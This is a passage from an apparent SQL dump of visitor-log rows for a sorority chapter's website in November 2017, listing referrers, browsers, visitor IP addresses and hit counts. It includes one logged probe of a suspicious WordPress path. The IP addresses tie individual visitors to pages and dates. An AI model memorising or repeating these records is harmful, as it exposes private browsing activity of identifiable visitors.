lgz.org','Chrome','Macintosh','61.0.3163.100','','54.219.178.100','000',2,0),(14160,'2017-11-17','https://zphiblgz.org','Firefox','Windows','40.1','','212.253.0.192','000',3,0),(14161,'2017-11-18','https://zphiblgz.org','Safari','iPhone','9.0','','221.13.12.61','000',1,0),(14162,'2017-11-18','https://zphiblgz.org','Safari','iPhone','9.0','','123.245.91.99','000',1,0),(14163,'2017-11-18','https://zphiblgz.org','Firefox','Windows','40.1','','185.31.143.82','000',3,0),(14164,'2017-11-18','https://zphiblgz.org','Safari','iPhone','7.0','','65.55.210.108','000',1,0),(14165,'2017-11-18','https://www.google.com/','Safari','iPhone','11.0','','174.204.19.28','000',4,0),(14166,'2017-11-18','http://zphiblgz.org/','Chrome','Windows','58.0.3029.110','','163.172.4.153','000',1,0),(14167,'2017-11-18','https://zphiblgz.org/','MSIE','Windows','9.0','','163.172.4.153','000',1,0),(14168,'2017-11-18','https://zphiblgz.org','Firefox','Linux','3.0.9','','194.28.115.252','000',1,0),(14169,'2017-11-18','https://zphiblgz.org','Wget','Unknown','1.8.1','','194.28.115.252','000',1,0),(14170,'2017-11-18','https://zphiblgz.org','Safari','Windows','3.1.2','','194.28.115.252','000',1,0),(14171,'2017-11-18','https://zphiblgz.org','Safari','Windows','3.0.1','','194.28.115.252','000',1,0),(14172,'2017-11-18','https://zphiblgz.org','Firefox','Windows','40.1','','27.106.24.231','000',3,0),(14173,'2017-11-18','https://zphiblgz.org','Chrome','Android','62.0.3202.84','','174.205.10.86','000',3,0),(14174,'2017-11-18','https://zphiblgz.org','Chrome','Android','60.0.3112.116','','192.12.13.14','000',3,0),(14175,'2017-11-18','https://zphiblgz.org','Firefox','Windows','40.1','','111.119.177.158','000',3,0),(14176,'2017-11-18','http://www.zphibmaryland.org/chapters/','Chrome','Android','62.0.3202.84','','96.244.99.17','000',16,0),(14177,'2017-11-18','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.210','000',1,0),(14178,'2017-11-18','https://zphiblgz.org','Chrome','Macintosh','57.0.2987.110','','46.229.170.197','000',1,0),(14179,'2017-11-18','https://zphiblgz.org','Safari','iPhone','9.0','','111.162.141.67','000',1,0),(14180,'2017-11-18','https://zphiblgz.org','Safari','iPhone','9.0','','150.255.1.79','000',1,0),(14181,'2017-11-18','https://zphiblgz.org','Firefox','Windows','40.1','','103.217.167.163','000',3,0),(14182,'2017-11-18','https://www.google.com/','Chrome','Android','62.0.3202.84','','174.205.7.31','000',2,0),(14183,'2017-11-18','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',5,0),(14184,'2017-11-18','https://zphiblgz.org/scholarship/application/','Chrome','Macintosh','61.0.3163.100','','71.179.100.71','000',1,0),(14185,'2017-11-18','https://zphiblgz.org/service/youth/','AppleWebKit','Windows','534','','65.55.210.136','000',1,0),(14186,'2017-11-18','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','173.69.157.50','000',3,0),(14187,'2017-11-18','http://zphiblgz.org','Chrome','Windows','59.0.3071.115','','67.190.118.9','000',1,0),(14188,'2017-11-18','https://zphiblgz.org','Chrome','Linux','5.0.342.1','','188.165.234.68','000',2,0),(14189,'2017-11-18','https://zphiblgz.org','Chrome','Macintosh','49.0.2623.87','','104.129.192.79','000',1,0),(14190,'2017-11-18','https://zphiblgz.org','Firefox','Windows','40.1','','176.234.143.26','000',3,0),(14191,'2017-11-18','https://zphiblgz.org','Firefox','Windows','40.1','','82.9.122.226','000',3,0),(14192,'2017-11-19','https://zphiblgz.org','python-requests','Unknown','2.18.4','','109.74.201.183','000',1,0),(14193,'2017-11-19','https://zphiblgz.org','Chrome','Windows','48.0.2564.109','','52.55.58.181','000',2,0),(14194,'2017-11-19','https://zphiblgz.org','python-requests','Unknown','2.18.4','','176.58.120.194','000',1,0),(14195,'2017-11-19','https://zphiblgz.org','python-requests','Unknown','2.18.4','','139.162.208.177','000',1,0),(14196,'2017-11-19','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.21','000',2,0),(14197,'2017-11-19','http://www.google.com/','Firefox','Windows','24.0','','185.40.4.116','000',1,0),(14198,'2017-11-19','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.219.178.100','000',4,0),(14199,'2017-11-19','http://zphiblgz.org/','Opera Next','Windows','44.0.2510.857','','213.167.199.5','000',2,0),(14200,'2017-11-19','https://zphiblgz.org','Safari','iPhone','7.0','','65.55.210.137','000',1,0),(14201,'2017-11-19','http://m.facebook.com','AppleWebKit','iPhone','604.3.5','','68.134.135.56','000',2,0),(14202,'2017-11-19','https://zphiblgz.org','Firefox','Windows','34.0','','109.201.93.42','000',1,0),(14203,'2017-11-19','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.67.67.222','000',2,0),(14204,'2017-11-19','https://zphiblgz.org','Firefox','Windows','40.0','','188.163.76.5','000',1,0),(14205,'2017-11-19','https://zphiblgz.org','Firefox','Windows','40.1','','176.160.141.134','000',3,0),(14206,'2017-11-19','https://zphiblgz.org','CATExplorador','Unknown','1.0beta','','45.63.115.240','000',3,0),(14207,'2017-11-19','https://zphiblgz.org','Firefox','Windows','34.0','','185.30.91.89','000',1,0),(14208,'2017-11-19','https://zphiblgz.org','Firefox','Windows','40.1','','89.128.191.41','000',3,0),(14209,'2017-11-19','http://m.facebook.com','Safari','iPhone','10.0','','173.252.98.27','000',2,0),(14210,'2017-11-19','https://zphiblgz.org/','Safari','iPhone','10.0','','173.252.98.24','000',1,0),(14211,'2017-11-19','https://zphiblgz.org','Firefox','Windows','40.1','','23.241.11.201','000',3,0),(14212,'2017-11-19','https://zphiblgz.org','Go--client','Unknown','1.1','','145.239.154.17','000',2,0),(14213,'2017-11-19','https://zphiblgz.org','Go--client','Unknown','1.1','','145.239.154.173','000',2,0),(14214,'2017-11-19','https://zphiblgz.org','Go--client','Unknown','1.1','','145.239.154.186','000',1,0),(14215,'2017-11-19','https://zphiblgz.org','Go--client','Unknown','1.1','','145.239.154.187','000',2,0),(14216,'2017-11-19','https://zphiblgz.org','Go--client','Unknown','1.1','','54.36.103.202','000',1,0),(14217,'2017-11-19','https://zphiblgz.org','Firefox','Windows','40.1','','181.26.79.234','000',3,0),(14218,'2017-11-19','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',5,0),(14219,'2017-11-19','https://zphiblgz.org','python-requests','Unknown','2.18.3','','175.42.46.248','000',2,0),(14220,'2017-11-19','https://zphiblgz.org','Chrome','Windows','35.0.1916.114','','175.42.46.248','000',1,0),(14221,'2017-11-19','https://zphiblgz.org','Safari','Macintosh','7.0.3','','175.42.46.248','000',1,0),(14222,'2017-11-19','https://zphiblgz.org','Chrome','Windows','36.0.1985.125','','175.42.46.248','000',2,0),(14223,'2017-11-19','https://zphiblgz.org','Safari','Macintosh','6.1.5','','175.42.46.248','000',1,0),(14224,'2017-11-19','http://zphiblgz.org','Firefox','Windows','41.0','','175.42.46.248','000',10,0),(14225,'2017-11-19','https://zphiblgz.org','Firefox','Linux','31.0','','175.42.46.248','000',1,0),(14226,'2017-11-19','https://zphiblgz.org','Chrome','Windows','36.0.1985.143','','175.42.46.248','000',1,0),(14227,'2017-11-19','https://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',2,0),(14228,'2017-11-19','http://zphiblgz.org/','MSIE','Windows','11.0','','82.103.134.122','000',1,0),(14229,'2017-11-19','https://zphiblgz.org','Safari','iPhone','7.0','','65.55.210.174','000',1,0),(14230,'2017-11-19','http://m.facebook.com','AppleWebKit','iPhone','604.3.5','','174.205.11.206','000',2,0),(14231,'2017-11-19','http://zphiblgz.org/','Chrome','Windows','58.0.3029.110','','178.137.166.150','000',3,0),(14232,'2017-11-19','https://zphiblgz.org/','Opera','Windows','12.17','','178.137.166.150','000',6,0),(14233,'2017-11-19','https://zphiblgz.org/scholarship/application/','Chrome','Macintosh','61.0.3163.100','','71.179.100.71','000',1,0),(14234,'2017-11-20','https://zphiblgz.org','Safari','iPhone','6.0','','123.126.113.109','000',2,0),(14235,'2017-11-20','https://zphiblgz.org','MSIE','Windows','11.0','','87.244.173.30','000',2,0),(14236,'2017-11-20','zphiblgz.org','Chrome','Windows','47.0.1335.75','','103.7.41.211','000',1,0),(14237,'2017-11-20','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','94.23.27.166','000',42,0),(14238,'2017-11-20','https://zphiblgz.org','Firefox','Windows','40.1','','213.133.160.140','000',3,0),(14239,'2017-11-20','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.210','000',1,0),(14240,'2017-11-20','https://www.google.com/url?sa=i&rct=j&q=&esrc=s&source=images&cd=&ved=0ahUKEwir0r3ZuM3XAhVGMSYKHbrFAakQjRwIBw&url=https%3A%2F%2Fzphiblgz.org%2Fhistory%2F&psig=AOvVaw3sLurIiyWuhQoB_FcVePW5&ust=1511277181091934','MSIE','Windows','11.0','','199.227.242.46','000',2,0),(14241,'2017-11-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','185.46.148.58','000',2,0),(14242,'2017-11-20','zphiblgz.org','Chrome','Windows','47.0.1335.75','','87.98.227.4','000',1,0),(14243,'2017-11-20','https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjJwtqH1s3XAhWms1QKHWpbAcMQFggoMAA&url=https%3A%2F%2Fzphiblgz.org%2F&usg=AOvVaw3q4W_LfCjivY3GRWBdIE5d','MSIE','Windows','11.0','','8.44.100.11','000',4,0),(14244,'2017-11-20','https://www.google.com/','Safari','Macintosh','11.0.1','','162.203.148.230','000',8,0),(14245,'2017-11-20','https://zphiblgz.org','Chrome','iPhone','62.0.3202.70','','172.58.184.235','000',4,0),(14246,'2017-11-20','https://zphiblgz.org','Firefox','Windows','55.0','','93.89.221.111','000',2,0),(14247,'2017-11-20','http://m.facebook.com','AppleWebKit','iPhone','604.3.5','','73.64.110.6','000',2,0),(14248,'2017-11-20','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',5,0),(14249,'2017-11-20','http://www.google.com/','Firefox','Windows','24.0','','185.40.4.116','000',1,0),(14250,'2017-11-20','https://zphiblgz.org','Chrome','Windows','41.0.2228.0','','104.197.141.11','000',6,0),(14251,'2017-11-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','72.14.199.131','000',1,0),(14252,'2017-11-20','http://www.zphibmaryland.org/chapters/','Safari','iPhone','10.0','','166.137.240.115','000',1,0),(14253,'2017-11-20','http://www.zphibmaryland.org/chapters/','Safari','iPhone','10.0','','107.77.202.51','000',2,0),(14254,'2017-11-20','http://m.facebook.com','AppleWebKit','iPhone','604.3.5','','172.58.184.171','000',2,0),(14255,'2017-11-20','https://www.google.com/','Chrome','Windows','61.0.3163.100','','128.244.87.103','000',3,0),(14256,'2017-11-20','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','172.58.184.230','000',2,0),(14257,'2017-11-20','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','96.234.147.182','000',11,0),(14258,'2017-11-20','http://www.google.com/search','Chrome','Linux','41.0.2272.118','','66.249.80.10','000',1,0),(14259,'2017-11-20','https://zphiblgz.org/','Chrome','Linux','41.0.2272.118','','66.249.80.8','000',1,0),(14260,'2017-11-20','zphiblgz.org','Chrome','Windows','50.0.2661.75','','89.36.211.128','000',1,0),(14261,'2017-11-20','https://zphiblgz.org','Firefox','Windows','32.0','','91.228.199.235','000',2,0),(14262,'2017-11-20','https://zphiblgz.org','Firefox','Windows','32.0','','37.59.17.114','000',2,0),(14263,'2017-11-20','https://zphiblgz.org','Firefox','Windows','32.0','','87.236.20.48','000',1,0),(14264,'2017-11-20','https://zphiblgz.org','Firefox','Windows','32.0','','188.165.244.171','000',2,0),(14265,'2017-11-20','https://www.google.com/','Safari','Macintosh','9.1.2','','76.100.200.217','000',4,0),(14266,'2017-11-20','https://www.google.com/','Safari','iPhone','11.0','','100.16.218.192','000',3,0),(14267,'2017-11-20','https://zphiblgz.org','Safari','Macintosh','5.0','','91.196.95.30','000',1,0),(14268,'2017-11-21','https://zphiblgz.org/','AppleWebKit','Windows','534','','131.253.27.60','000',1,0),(14269,'2017-11-21','https://zphiblgz.org/scholarship/application/','Chrome','Macintosh','61.0.3163.100','','71.179.100.71','000',1,0),(14270,'2017-11-21','https://zphiblgz.org','Firefox','Windows','56.0','','5.188.62.53','000',2,0),(14271,'2017-11-21','https://zphiblgz.org','Safari','iPhone','7.0','','199.30.24.181','000',1,0),(14272,'2017-11-21','https://zphiblgz.org','MSIE','Windows','11.0','','172.82.185.210','000',2,0),(14273,'2017-11-21','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1612.lodKLZYYUS5yzqpsCSDW8x1XrgvPDqXhScJA1EgDRgx5wplaHWJwGGJlV7I0SPwU.389b68847dd264a2ced09d3c8622405817648e22&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YGftRg9cP1erjBfVTUcXDXk&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIVlE5M1MxRWZoT3pXYTdXSEktSXM3SnZHSXpPODBzTGZJZEVCdXduNUNIbmQtZTdmZ1FJUzVw&b64e=2&sign=f01508c5d3407a17dbe8b26f180e2d8b&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYP93Xfrtkba1IDlFgs9PjJCcrt9ezWRrSb1IxpBjghTKdwR0u0LnD-9_1kyQxvQCzXGzFwUqrIK6tZQRuJc4wasGBZJ52VNR-dwycRPwgOHSBU5jRhIfW86vYJG1ybccQJkDiVty9wV&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCUPlG4bHKQJvNVcfe5rV5ETDkcCKKmNiLUXGIUhPMz272uwxSGht6V2gEVWOmk8WGY3C0e5920X_g&l10n=ru&cts=1511268096133&mc=6.26919278344','MSIE','Windows','10.0','','46.188.29.95','000',1,0),(14274,'2017-11-21','http://www.bing.com/search?q=Lambda%20Gamma%20Zeta%20sorority%20howard%20county&qs=n&form=QBRE&sp=-1&pq=undefined&sc=0-27&sk=&cvid=A46AB70B2F6C4AD1A217EB529A7BE930','MSIE','Windows','11.0','','208.76.113.13','000',4,0),(14275,'2017-11-21','https://www.google.com/','Chrome','Windows','62.0.3202.94','','50.193.144.17','000',12,0),(14276,'2017-11-21','zphiblgz.org','Chrome','Windows','50.0.13.75','','176.31.191.186','000',1,0),(14277,'2017-11-21','zphiblgz.org','Chrome','Windows','50.0.13.75','','188.213.175.168','000',1,0),(14278,'2017-11-21','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',5,0),(14279,'2017-11-21','https://zphiblgz.org','Chrome','Chrome OS','62.0.3202.82','','204.62.51.167','000',14,0),(14280,'2017-11-21','https://zphiblgz.org','Chrome','Windows','61.0.3163.100','','54.242.40.103','000',2,0),(14281,'2017-11-21','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.80','000',1,0),(14282,'2017-11-21','https://zphiblgz.org','Safari','iPhone','7.0','','65.55.210.16','000',1,0),(14283,'2017-11-21','http://www.zphiblgz.org/index.php','Firefox','Windows','52.0','','178.137.17.30','000',3,0),(14284,'2017-11-21','https://zphiblgz.org','Safari','iPhone','7.0','','40.77.177.224','000',1,0),(14285,'2017-11-21','http://www.zphibmaryland.org/chapters/','Safari','iPhone','11.0','','98.233.149.190','000',8,0),(14286,'2017-11-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','185.46.148.58','000',2,0),(14287,'2017-11-21','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.178','000',2,0),(14288,'2017-11-21','https://zphiblgz.org','Chrome','Android','62.0.3202.84','','68.134.239.196','000',2,0),(14289,'2017-11-21','https://zphiblgz.org','Chrome','Windows','59.0.3043.0','','24.104.140.200','000',3,0),(14290,'2017-11-21','http://m.facebook.com','AppleWebKit','iPhone','604.3.5','','73.132.165.214','000',2,0),(14291,'2017-11-21','https://zphiblgz.org','Firefox','Windows','40.1','','135.23.41.68','000',3,0),(14292,'2017-11-21','https://zphiblgz.org','Safari','iPad','11.0','','71.121.204.212','000',3,0),(14293,'2017-11-21','https://www.google.com/','Firefox','Windows','57.0','','108.31.90.51','000',2,0),(14294,'2017-11-21','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.219.178.100','000',2,0),(14295,'2017-11-22','https://zphiblgz.org','Safari','iPhone','10.0','','174.205.8.58','000',3,0),(14296,'2017-11-22','http://www.baidu.com/s?wd=V4L3','Firefox','Windows','43.0','','123.125.143.147','000',1,0),(14297,'2017-11-22','http://zphiblgz.org','Firefox','Windows','3.6.8','','89.234.68.90','000',10,0),(14298,'2017-11-22','https://zphiblgz.org','Firefox','Windows','34.0','','62.33.108.249','000',1,0),(14299,'2017-11-22','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.67.67.222','000',2,0),(14300,'2017-11-22','https://zphiblgz.org/','Opera Next','Windows','43.0.2442.1144','','5.35.16.67','000',1,0),(14301,'2017-11-22','http://www.google.com/','Firefox','Windows','24.0','','185.40.4.116','000',1,0),(14302,'2017-11-22','zphiblgz.org','Firefox','Macintosh','16.0','','62.77.94.15','000',2,0),(14303,'2017-11-22','https://zphiblgz.org/scholarship/application/','Chrome','Macintosh','61.0.3163.100','','71.179.100.71','000',1,0),(14304,'2017-11-22','https://us.search.yahoo.com/','Firefox','Windows','56.0','','24.104.140.200','000',26,0),(14305,'2017-11-22','https://zphiblgz.org/','Chrome','Windows','55.0.2883.75','','5.35.16.67','000',1,0),(14306,'2017-11-22','http://zphiblgz.org/wp-includes/pomo/bo.php','MSIE','Windows','6.0','','178.121.1.145','000',1,0),(14307,'2017-11-22','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','69.250.76.202','000',2,0),(14308,'2017-11-22','https://zphiblgz.org','Chrome','Windows','61.0.3163.100','','50.17.24.127','000',2,0),(14309,'2017-11-22','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.219.178.100','000',2,0),(14310,'2017-11-22','https://www.google.com/','Chrome','Windows','62.0.3202.62','','167.102.228.16','000',1,0),(14311,'2017-11-22','https://zphiblgz.org/','Safari','iPhone','10.0','','174.194.6.228','000',2,0),(14312,'2017-11-22','https://zphiblgz.org','Firefox','Windows','21.0','','5.9.17.118','000',1,0),(14313,'2017-11-22','https://zphiblgz.org','Safari','Macintosh','6.0','','144.76.153.198','000',1,0),(14314,'2017-11-22','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',5,0),(14315,'2017-11-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','184.168.193.42','000',1,0),(14316,'2017-11-22','https://zphiblgz.org','MSIE','Windows','11.0','','128.220.160.1','000',2,0),(14317,'2017-11-22','https://zphiblgz.org','Firefox','Windows','34.0','','85.115.224.195','000',1,0),(14318,'2017-11-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','77.79.230.5','000',1,0),(14319,'2017-11-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','84.200.223.40','000',1,0),(14320,'2017-11-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.175.239.7','000',1,0),(14321,'2017-11-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','91.238.160.158','000',1,0),(14322,'2017-11-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','89.238.188.41','000',1,0),(14323,'2017-11-22','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','100.16.228.103','000',6,0),(14324,'2017-11-22','https://zphiblgz.org','Firefox','Linux','42.0','','198.46.226.121','000',2,0),(14325,'2017-11-22','https://zphiblgz.org','Firefox','Windows','40.1','','95.77.160.224','000',2,0),(14326,'2017-11-22','https://zphiblgz.org','Safari','iPhone','9.0','','123.160.233.55','000',1,0),(14327,'2017-11-22','https://zphiblgz.org','Safari','iPhone','9.0','','220.248.66.89','000',1,0),(14328,'2017-11-22','https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=12&ved=0ahUKEwjdh_Wz59PXAhWiRt8KHR5RDpAQFghSMAs&url=https%3A%2F%2Fzphiblgz.org%2Fts_teams%2Ftamika-r-daniels%2F&usg=AOvVaw0nXgZ5qe9OH_Y-Yi0asI39','MSIE','Windows','11.0','','98.233.136.221','000',2,0),(14329,'2017-11-22','http://m.facebook.com','AppleWebKit','iPhone','604.3.5','','166.137.240.113','000',2,0),(14330,'2017-11-22','zphiblgz.org','Chrome','Windows','47.0.1335.75','','82.165.140.254','000',1,0),(14331,'2017-11-23','http://zphiblgz.org/','Firefox','Windows','27.0','','156.67.106.49','000',3,0),(14332,'2017-11-23','https://zphiblgz.org','Chrome','Windows','41.0.2228.0','','104.166.88.75','000',2,0),(14333,'2017-11-23','https://zphiblgz.org','Firefox','Windows','36.0','','23.254.164.219','000',2,0),(14334,'2017-11-23','https://zphiblgz.org','Chrome','Windows','34.0.1847.137','','54.189.20.85','000',1,0),(14335,'2017-11-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','112.243.123.199','000',15,0),(14336,'2017-11-23','https://zphiblgz.org','Firefox','Windows','1.0.7','','54.173.215.184','000',1,0),(14337,'2017-11-23','https://zphiblgz.org','Firefox','Windows','40.1','','51.36.246.9','000',3,0),(14338,'2017-11-23','https://zphiblgz.org','Firefox','Windows','40.1','','105.105.113.41','000',3,0),(14339,'2017-11-23','http://m.facebook.com','AppleWebKit','iPhone','604.3.5','','173.69.172.143','000',2,0),(14340,'2017-11-23','https://zphiblgz.org','Firefox','Windows','40.1','','202.142.105.1','000',3,0),(14341,'2017-11-23','74.220.219.51','Firefox','Windows','33.0','','159.203.81.93','000',1,0),(14342,'2017-11-23','https://zphiblgz.org','Firefox','Windows','40.1','','187.37.39.236','000',3,0),(14343,'2017-11-23','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',5,0),(14344,'2017-11-23','https://zphiblgz.org','Firefox','Windows','40.1','','41.251.39.196','000',3,0),(14345,'2017-11-23','http://m.facebook.com','AppleWebKit','iPhone','604.3.5','','73.132.135.151','000',2,0),(14346,'2017-11-23','https://zphiblgz.org','Chrome','Windows','40.0.2214.85','','138.246.253.19','000',1,0),(14347,'2017-11-23','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.29','000',1,0),(14348,'2017-11-23','https://zphiblgz.org','Safari','iPhone','7.0','','199.30.24.36','000',1,0),(14349,'2017-11-23','http://zphiblgz.org/','WordPress','Unknown','Unknown','','192.0.89.120','000',2,0),(14350,'2017-11-23','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.230','000',2,0),(14351,'2017-11-23','http://www.google.com/','Firefox','Windows','24.0','','185.40.4.116','000',1,0),(14352,'2017-11-23','http://zphiblgz.org/','Chrome','Macintosh','57.0.2987.133','','163.172.4.153','000',1,0),(14353,'2017-11-23','https://zphiblgz.org/','Safari','Macintosh','10.1.1','','163.172.4.153','000',1,0),(14354,'2017-11-23','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.219.178.100','000',2,0),(14355,'2017-11-23','http://zphiblgz.org/n_top/2017/07/-12.html','Chrome','Windows','56.0.2924.87','','178.137.166.150','000',4,0),(14356,'2017-11-23','https://zphiblgz.org','Safari','iPhone','11.0','','65.191.71.233','000',3,0),(14357,'2017-11-23','http://zphiblgz.org/','WordPress','Unknown','Unknown','','192.0.99.139','000',2,0),(14358,'2017-11-23','https://www.google.co.jp/','Chrome','Windows','62.0.3202.94','','58.1.224.29','000',2,0),(14359,'2017-11-24','https://zphiblgz.org','Firefox','Linux','50.0','','137.226.113.22','000',2,0),(14360,'2017-11-24','https://zphiblgz.org','Firefox','Windows','40.1','','42.117.220.201','000',3,0),(14361,'2017-11-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','171.25.193.25','000',1,0),(14362,'2017-11-24','https://zphiblgz.org','Firefox','Windows','40.1','','117.192.16.10','000',3,0),(14363,'2017-11-24','https://zphiblgz.org','Dispatch','Unknown','0.11.1','','54.208.101.169','000',2,0),(14364,'2017-11-24','https://zphiblgz.org','Safari','iPhone','9.0','','113.63.94.240','000',1,0),(14365,'2017-11-24','https://zphiblgz.org','Safari','iPhone','9.0','','218.72.49.247','000',1,0),(14366,'2017-11-24','zphiblgz.org','Chrome','Windows','47.0.1335.75','','176.31.107.99','000',5,0),(14367,'2017-11-24','https://zphiblgz.org','Chrome','Windows','41.0.2228.0','','104.166.88.75','000',2,0),(14368,'2017-11-24','https://zphiblgz.org','Safari','iPhone','7.0','','199.30.24.128','000',1,0),(14369,'2017-11-24','http://m.facebook.com','AppleWebKit','iPhone','603.3.8','','100.16.219.197','000',2,0),(14370,'2017-11-24','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.67.67.222','000',2,0),(14371,'2017-11-24','https://zphiblgz.org','Go--client','Unknown','1.1','','145.239.154.187','000',2,0),(14372,'2017-11-24','https://zphiblgz.org','Firefox','Windows','56.0','','178.210.90.90','000',4,0),(14373,'2017-11-24','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',5,0),(14374,'2017-11-24','https://zphiblgz.org','Safari','iPhone','6.0','','218.30.103.17','000',2,0),(14375,'2017-11-24','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','73.172.120.252','000',3,0),(14376,'2017-11-24','https://zphiblgz.org','Firefox','Windows','34.0','','188.123.252.215','000',1,0),(14377,'2017-11-24','http://m.facebook.com','AppleWebKit','iPhone','604.3.5','','71.244.251.124','000',2,0),(14378,'2017-11-24','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','100.16.228.103','000',3,0),(14379,'2017-11-24','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1615.OKYMy8JRg-qzhMM5rTuh9Vq_84_BRkTaoCTQDyMk0KUE_8DswzrF90fTnJAz8taB.2b6bdf69399003fbf3d4de36b30e132581da9898&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YCYBcIrWNUha-mUlBiA3OhY&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWTFpUeUVaNjZCRU9BYW1ENmNBQV9qeEQ4VEl5c1hqUlFSN1VscUY3SG5IcnlkamktWHZid29ad3dUeFdZVHVISlVPeGptODFNalhFUQ&b64e=2&sign=ec3cec5ba77b83fe1035c3e6469bf10b&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQXbYQp9t5VF6NgHz_9gfcBBOvrusniv6oZR4TmO7eW8YFcY3K9YxWIqxqnOKNGRZZwYQBV3OGwEcSVOEiiPOMLUQi_dqvE0ENRF-QKOCubm4axdNwrl6UhXIs_xuYainZaun29jvgQCy&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCW5ri5MzTNSEsz3Ws-asGpwAeZexFrRsue2IFqLyauKMIYwHbvElBfulh7okwZDxK3S-dGPLs3DIw&l10n=ru&cts=1511566973607&mc=3.09252645319','Chrome','Windows','60.0.3112.113','','176.193.132.81','000',2,0),(14380,'2017-11-24','https://zphiblgz.org','Safari','iPhone','7.0','','131.253.27.69','000',1,0),(14381,'2017-11-24','http://www.zphibmaryland.org/chapters/','Chrome','Windows','62.0.3202.94','','71.166.46.100','000',9,0),(14382,'2017-11-24','zphiblgz.org','Chrome','Windows','50.0.2661.75','','204.10.105.9','000',1,0),(14383,'2017-11-24','https://zphiblgz.org','Safari','iPhone','7.0','','65.55.210.8','000',1,0),(14384,'2017-11-24','https://zphiblgz.org','AppleWebKit','Windows','534','','199.30.24.70','000',1,0),(14385,'2017-11-25','https://zphiblgz.org','Safari','iPhone','9.0','','123.191.150.66','000',1,0),(14386,'2017-11-25','https://zphiblgz.org','Safari','iPhone','9.0','','123.191.131.45','000',1,0),(14387,'2017-11-25','https://zphiblgz.org','Chrome','Windows','10.0.648.204','','74.85.214.160','000',2,0),(14388,'2017-11-25','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.19','000',1,0),(14389,'2017-11-25','https://zphiblgz.org/scholarship/application/','Chrome','Macintosh','61.0.3163.100','','12.168.100.111','000',1,0),(14390,'2017-11-25','https://zphiblgz.org','Firefox','Windows','40.1','','90.106.233.67','000',3,0),(14391,'2017-11-25','https://zphiblgz.org','Firefox','Windows','3.5.6','','194.67.221.77','000',1,0),(14392,'2017-11-25','https://zphiblgz.org','MSIE','Windows','11.0','','73.191.57.222','000',3,0),(14393,'2017-11-25','http://zphiblgz.org/','Chrome','Windows','36.0.1985.125','','220.181.132.177','000',2,0),(14394,'2017-11-25','https://zphiblgz.org','Chrome','Windows','50.0.2661.102','','106.120.162.108','000',1,0),(14395,'2017-11-25','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','100.16.228.103','000',8,0),(14396,'2017-11-25','http://www.google.com/','Firefox','Windows','24.0','','185.40.4.116','000',1,0),(14397,'2017-11-25','https://zphiblgz.org','Firefox','Windows','40.1','','86.138.230.173','000',3,0),(14398,'2017-11-25','https://www.bing.com/','Edge','Windows','13.10586','','71.57.247.160','000',3,0),(14399,'2017-11-25','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',6,0),(14400,'2017-11-25','https://zphiblgz.org','AppleWebKit','Windows','534','','65.55.210.46','000',1,0),(14401,'2017-11-25','h